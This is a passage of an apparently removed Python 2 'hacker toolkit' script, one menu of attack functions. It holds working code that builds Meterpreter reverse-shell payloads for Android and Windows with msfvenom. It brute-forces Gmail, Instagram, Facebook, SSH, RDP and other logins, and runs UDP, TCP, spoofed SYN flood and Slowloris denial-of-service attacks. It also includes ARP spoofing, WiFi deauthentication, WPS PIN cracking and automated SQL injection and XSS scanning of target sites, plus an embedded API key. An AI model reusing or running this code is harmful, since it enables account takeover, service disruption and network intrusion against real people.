LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", 